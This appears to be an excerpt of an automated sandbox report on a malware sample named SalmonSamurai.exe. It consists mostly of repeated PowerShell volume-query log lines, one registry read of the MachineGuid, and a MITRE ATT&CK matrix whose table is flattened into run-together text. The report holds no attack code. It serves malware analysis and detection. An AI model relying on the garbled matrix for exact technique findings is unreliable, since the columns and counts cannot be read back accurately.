Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Roaming\NsisExtracted\SalmonSamurai.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		12
Process Injection		1
Masquerading		11
Input Capture		21
Security Software Discovery		Remote Services11
Input Capture		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Command and Scripting Interpreter		1
DLL Search Order Hijacking		1
DLL Side-Loading		41
Virtualization/Sandbox Evasion		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable Media3
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Search Order Hijacking		12
Process Injection		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive4
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading		NTDS1
Application Window Discovery		Distributed Component Object ModelInput Capture5
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Search Order Hijacking		LSA Secrets1
Remote System Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync32
